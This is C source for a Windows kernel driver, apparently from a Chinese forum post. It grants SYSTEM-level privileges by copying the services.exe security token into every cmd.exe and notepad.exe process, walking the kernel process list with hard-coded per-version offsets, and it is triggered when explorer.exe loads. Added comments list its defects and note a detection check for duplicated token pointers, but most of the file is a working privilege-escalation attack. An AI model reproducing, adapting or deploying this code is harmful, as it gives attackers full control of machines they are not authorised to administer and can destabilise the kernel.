驱动实现win7下cmd提权
//win7提权//code by Peter Kleissner
#include "ntddk.h"
#include "ntdddisk.h"
#include "windef.h"
/* Constants and a hook descriptor that nothing in the visible file references:
 * neither the Sb* values, the HookType_* values nor the Hook global are used by
 * DriverEntry, NotifyRoutine or PrivilegeEscalation below. They look like
 * leftovers of a separate hooking facility. */
#define SbNotifyDriverLoad 0
#define SbInstallWindowsHook 2
#define HookType_Hook 0
#define HookType_Intercept 1
/* Unused global of anonymous struct type. */
struct
{
void * FunctionName;
void * FunctionHook;
unsigned Type;
} Hook;
/* Walks the kernel process list and copies one process's token field into
 * others. Declared with the shape of a thread start routine, but it is called
 * directly from NotifyRoutine with NULL and never reads StartContext. */
void PrivilegeEscalation(IN PVOID StartContext);
/* Image-load callback registered by DriverEntry via PsSetLoadImageNotifyRoutine. */
void NotifyRoutine(IN PUNICODE_STRING FullImageName, IN HANDLE ProcessId, IN PIMAGE_INFO ImageInfo);
/*
 * Driver entry point.
 *
 * The only effect is registering NotifyRoutine as an image-load callback. The
 * NTSTATUS returned by PsSetLoadImageNotifyRoutine is discarded, so a failed
 * registration is still reported to the loader as STATUS_SUCCESS.
 *
 * pDriverObject and theRegistryPath are not used: no DriverUnload routine is
 * installed, and nothing in the visible file ever removes the callback again,
 * so once loaded the driver cannot be unloaded safely.
 *
 * ThreadHandle is never used and ObjectAttributes is initialised but never
 * passed to anything -- presumably remnants of a variant that ran
 * PrivilegeEscalation on its own thread (its StartContext parameter has the
 * shape of a thread start routine).
 *
 * From a defender's view, the callback registration and the DbgPrint strings
 * in this file are the observable artefacts of the driver.
 */
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
HANDLE ThreadHandle;                /* unused */
OBJECT_ATTRIBUTES ObjectAttributes; /* initialised below, never used */
DbgPrint("\nhere we go!\n\n");
InitializeObjectAttributes(&ObjectAttributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
PsSetLoadImageNotifyRoutine(&NotifyRoutine); /* return status ignored */
return STATUS_SUCCESS;
}
/*
 * Image-load callback: invoked for every image mapped into any process.
 *
 * Logs the image path, then compares up to 51 wide characters of
 * FullImageName->Buffer, case-insensitively, against one hard-coded path and
 * runs PrivilegeEscalation on a match. Points a reviewer should know:
 *  - The literal is 44 characters long, so the count of 51 exceeds it and the
 *    comparison effectively runs until the literal's terminator.
 *  - A UNICODE_STRING is not required to be NUL-terminated; _wcsnicmp reads
 *    Buffer as a C string and FullImageName->Length is ignored. Neither
 *    FullImageName nor Buffer is checked for NULL before being dereferenced.
 *  - The volume name "\Device\HarddiskVolume1" is hard-coded, so explorer.exe
 *    loaded from any other volume never matches.
 *  - explorer.exe being the trigger means the escalation runs every time that
 *    image is mapped (e.g. at interactive logon -- inferred from the name).
 * ProcessId and ImageInfo are unused.
 */
void NotifyRoutine(IN PUNICODE_STRING FullImageName, IN HANDLE ProcessId, IN PIMAGE_INFO ImageInfo)
{
DbgPrint("Image Load: %wZ\n", FullImageName);
if(_wcsnicmp(FullImageName->Buffer, L"\\Device\\HarddiskVolume1\\Windows\\explorer.exe", 51) == 0 )
PrivilegeEscalation(NULL); /* callee never reads StartContext */
}
/*
 * Copies the token field of the process named "services.exe" into every
 * process named "cmd.exe" or "notepad.exe", by walking the kernel's linked
 * process list with hard-coded, per-OS-version offsets. StartContext is unused.
 *
 * Offset conventions (the field names are not verifiable from this file; the
 * variable names suggest ActiveProcessLinks / ImageFileName / Token):
 *  - OffsetAPL is added to the process base obtained from IoGetCurrentProcess.
 *  - The value read there is a pointer that the code then uses directly as a
 *    base for OffsetIN and OffsetST, so those two offsets are measured from the
 *    link field, not from the start of the process structure.
 * Every read and write is DWORD-sized, so this only makes sense on a 32-bit
 * kernel; on a 64-bit kernel both the widths and the offsets are wrong.
 *
 * Defects visible in the code:
 *  - The while(1) search for "services.exe" has no terminating condition; if
 *    no such entry is found the callback spins forever.
 *  - The list is traversed and written without any synchronisation with the
 *    kernel; entries can be torn down concurrently.
 *  - The raw field value, not a cleaned object pointer, is passed to
 *    ObReferenceObject and copied verbatim; whether that is a valid object
 *    pointer on these versions cannot be confirmed from this file.
 *  - The success message always names cmd.exe, even for notepad.exe.
 *
 * Detection / mitigation view: after this runs, a cmd.exe or notepad.exe
 * process carries the same token pointer as services.exe. Comparing process
 * token pointers across the process list from kernel memory is a standard
 * hunting check for this class of change; driver signature enforcement on
 * 64-bit Windows raises the bar for loading such a driver at all (and the
 * offsets here are 32-bit only in any case).
 */
void PrivilegeEscalation(IN PVOID StartContext)
{
PEPROCESS CurrentProcess, ServiceProcess, FirstProcess;
DWORD ServiceSecurityToken;
RTL_OSVERSIONINFOW OSVersionInfo;
DWORD OffsetAPL, OffsetIN, OffsetST;
CurrentProcess = IoGetCurrentProcess();
OSVersionInfo.dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOW);
/* PsGetVersion first, to decide whether RtlGetVersion may be called at all;
 * RtlGetVersion is what fills in dwBuildNumber used below. */
PsGetVersion(&OSVersionInfo.dwMajorVersion, &OSVersionInfo.dwMinorVersion, NULL, NULL);
if (!(OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 0)) // RtlGetVersion() is only supported on XP and later
RtlGetVersion(&OSVersionInfo);
/* Per-version offset table. Only the major/minor (and two build numbers) are
 * matched, so service packs and later builds of a version are assumed to share
 * the layout of the one listed. */
if (OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 0) // Windows 2000
{ OffsetAPL = 0xA0; OffsetIN = 0x15C; OffsetST = 0x8C; }
else if (OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 1) // Windows XP
{ OffsetAPL = 0x88; OffsetIN = 0xEC; OffsetST = 0x40; }
else if (OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 2) // Windows Server 2003
{ OffsetAPL = 0x88; OffsetIN = 0xCC; OffsetST = 0x40;
if (OSVersionInfo.dwBuildNumber == 3790) OffsetAPL += 0x10; } // Windows Server 2003 R2
else if (OSVersionInfo.dwMajorVersion == 6 && OSVersionInfo.dwMinorVersion == 0) // Windows Vista, Windows Server 2008
{ OffsetAPL = 0xA0; OffsetIN = 0xAC; OffsetST = 0x40; }
else if (OSVersionInfo.dwMajorVersion == 6 && OSVersionInfo.dwMinorVersion == 1) // Windows 7 RC
{ OffsetAPL = 0xB8; OffsetIN = 0xB4; OffsetST = 0x40;
if (OSVersionInfo.dwBuildNumber == 7000) OffsetIN = 0xAC; } // Windows 7 Beta (build 7000) differs only in OffsetIN
else
{
/* Message is narrower than the table above, which also covers 2000/XP/2003/Vista. */
DbgPrint("this is only supported on win 7\n");
return;
}
// find services.exe process structure
/* Read the link field of the current process, then follow it once more; from
 * here on the link pointer itself is used as the base for OffsetIN/OffsetST. */
ServiceProcess = *(PEPROCESS *)((BYTE *)CurrentProcess + OffsetAPL);
ServiceProcess = *(PEPROCESS *)(ServiceProcess);
while (1) /* no exit other than a name match -- loops forever if none is found */
{
/* %s assumes the name field at OffsetIN is NUL-terminated; no bound is applied. */
DbgPrint("Found Process: %s\n", (char *)ServiceProcess + OffsetIN);
if (_stricmp((char *)ServiceProcess + OffsetIN, "services.exe") == 0)
break;
ServiceProcess = *(PEPROCESS *)(ServiceProcess);
}
/* OffsetST/4 in DWORD units equals a byte offset of OffsetST (every OffsetST
 * value above is a multiple of 4). */
ServiceSecurityToken = *(DWORD *)((DWORD *)ServiceProcess + OffsetST/4);
DbgPrint("System Service Security Token: %08x\n", ServiceSecurityToken);
// now escalate any cmd.exe, notepad.exe, King Kleissner process
/* Start from the entry after the current process and stop when the next entry
 * would be the starting one again; the entry just before the start (the
 * current process itself) is therefore never visited. */
CurrentProcess = *(PEPROCESS *)((BYTE *)CurrentProcess + OffsetAPL);
for (FirstProcess = CurrentProcess; FirstProcess != *(PEPROCESS *)(CurrentProcess); CurrentProcess = *(PEPROCESS *)(CurrentProcess))
{
if ( _stricmp((char *)CurrentProcess + OffsetIN, "cmd.exe") == 0 ||
_stricmp((char *)CurrentProcess + OffsetIN, "notepad.exe") == 0 )
{
DbgPrint("Overwriting old Security Token: %08x\n", *(DWORD *)((DWORD *)CurrentProcess + OffsetST/4));
/* The raw field value is treated as an object pointer; the old value is
 * overwritten without being dereferenced/released. */
ObReferenceObject((void *)ServiceSecurityToken);
*(DWORD *)((DWORD *)CurrentProcess + OffsetST/4) = ServiceSecurityToken;
DbgPrint("cmd.exe privilege escalated successfully!\n"); /* printed for notepad.exe too */
}
}
} /* trailing forum remark (translated): "once you are in ring 0, what is there you cannot do" */